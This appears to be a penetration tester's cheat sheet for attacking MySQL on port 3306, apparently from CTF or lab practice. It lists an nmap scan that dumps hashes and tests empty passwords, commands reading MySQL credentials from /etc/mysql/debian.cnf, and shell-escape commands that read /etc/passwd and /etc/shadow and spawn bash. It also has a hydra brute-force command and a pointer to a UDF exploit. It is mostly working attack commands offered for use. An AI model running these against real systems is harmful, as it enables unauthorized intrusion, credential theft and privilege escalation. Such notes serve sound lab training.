MySQL
Ports #
- 3306/tcp
Gathering Information from outside #
# nmap
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.166.72
Authentication #
# extracting creds from files
cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" | grep -v "mysql_native_password"
Gathering infor inside SQL shell #
; Checks version
select @@version;
; Checks user
select user();
; checks permissions and privileges
show grants for 'root'@'localhost';
Privesc #
; Breaks out from shell
\! cat /etc/passwd
\! cat /etc/shadow
\! bash
Files and directories #
# settings
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
Brute Force #
# mysql over ssh tunnel
hydra -V -L users.txt -P passwords.txt 127.0.0.1 -s 9000 mysql
Exploits #
- UDF - used in vulnhub lord of the root